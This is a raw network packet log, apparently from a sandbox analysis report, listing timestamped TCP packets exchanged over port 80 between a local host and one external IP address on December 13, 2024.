Dec 13, 2024 07:47:06.638098001 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.638155937 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.640548944 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.640583992 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.640969992 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.640969992 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.642898083 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.643006086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.643059969 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.643059969 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.645359039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.645463943 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.645670891 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.645670891 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.647795916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.647850037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.647897959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.648425102 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.650125027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.650229931 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.650242090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.650275946 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.652550936 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.652617931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.652628899 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.652705908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.654855013 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.654918909 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.654969931 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.655102968 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.657210112 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.657329082 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.657370090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.657387018 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.659564018 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.659681082 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.659702063 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.659734011 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.661964893 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.662020922 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.662062883 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.662343025 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.664311886 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.664422035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.664428949 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.664475918 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.666769981 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.666821003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.666929960 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.669104099 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.669194937 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.669209957 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.669774055 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.671435118 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.671530008 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.671564102 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.671629906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.673834085 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.673907042 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.673913002 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.673964977 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.676148891 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.676217079 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.676649094 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.676649094 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.678563118 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.678642988 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.678760052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.678760052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.680893898 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.680972099 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.680999041 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.681492090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.683247089 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.683340073 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.683378935 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.683430910 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.685616970 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.685746908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.685775995 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.685827971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.688076973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.688133001 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.688175917 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.688220978 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.690444946 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.690555096 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.690768003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.690768003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.692744970 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.692852020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.692902088 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.692902088 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.695169926 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.695238113 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.695333958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.695333958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.697498083 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.697623968 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.698570013 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.698570013 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.699863911 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.699915886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.699965954 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.700066090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.702218056 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.702299118 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.702306032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.702354908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.704570055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.704679966 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.704682112 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.704807043 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.706908941 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.706967115 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.707020998 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.707106113 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.709314108 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.709423065 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.709474087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.709474087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.711832047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.711893082 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.711893082 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.711966991 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.714121103 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.714186907 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.714277983 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.714340925 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.716419935 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.716511965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.716555119 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.716684103 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.718801022 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.718980074 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.718982935 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.719057083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.721162081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.721281052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.721340895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.721340895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.723511934 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.723571062 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.723628044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.723683119 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.725953102 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.726027012 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.726067066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.726067066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.728323936 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.728382111 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.728434086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.728476048 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.730638027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.730710030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.730748892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.730834961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.733042955 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.733103037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.733201027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.733993053 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.735363960 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.735416889 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.735444069 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.735482931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.737653017 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.737708092 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.804867029 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.804996967 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.805018902 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.805047035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.805799007 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.805852890 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.805856943 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.805907011 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.806803942 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.806898117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.806906939 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.806965113 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.808007956 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.808063984 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.808064938 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.808118105 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.809818029 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.809912920 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.809981108 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.810065031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.811691999 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.811763048 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.811880112 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.811981916 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.814758062 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.814810038 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.814877987 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.815378904 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.815527916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.815581083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.815581083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.815581083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.817182064 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.817243099 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.817327023 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.817377090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.818989992 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.819051981 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.819135904 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.819192886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.820663929 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.820732117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.820791006 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.820864916 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.822405100 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.822460890 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.822532892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.822628975 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.824129105 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.824189901 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.824271917 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.824423075 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.825850010 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.825906992 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.825932026 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.826328993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.827505112 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.827583075 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.827620983 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.827677965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.829202890 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.829307079 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.829319000 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.829726934 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.830852032 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.830912113 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.830992937 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.831051111 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.832489014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.832608938 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.832648039 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.832648039 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.834140062 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.834256887 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.834306002 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.834306002 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.835777044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.835866928 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.835907936 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.835964918 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.837376118 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.837431908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.837537050 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.837598085 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.838958025 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.839050055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.839119911 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.839119911 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.840497971 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.840559006 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.840567112 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.840619087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.842067957 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.842124939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.842178106 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.842231035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.843641043 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.843719006 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.843758106 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.843854904 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.845153093 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.845212936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.845283031 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.845336914 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.846714020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.846788883 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.847011089 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.847011089 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.848196030 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.848324060 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.848411083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.848411083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.849740028 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.849798918 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.849855900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.849939108 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.851232052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.851334095 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.851346970 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.851403952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.852683067 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.852798939 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.852838993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.852838993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.854150057 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.854254007 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.854280949 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.854341030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.855613947 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.855710030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.855751038 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.855823040 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.857129097 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.857235909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.858004093 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.858004093 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.858558893 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.858699083 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.859065056 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.859065056 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.860033035 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.860130072 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.860178947 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.860825062 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.861484051 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.861540079 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.862262011 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.862262964 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.862298012 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.862377882 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.862384081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.863143921 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.863276958 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.863311052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.863311052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.863337040 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.863975048 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.864028931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.864095926 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.864473104 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.864815950 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.864943027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.865255117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.865255117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.865658045 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.865786076 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.865794897 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.866518974 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.866641998 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.866647959 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.866647959 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.867333889 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.867381096 CET	80	49738	185.81.68.147	192.168.2.4
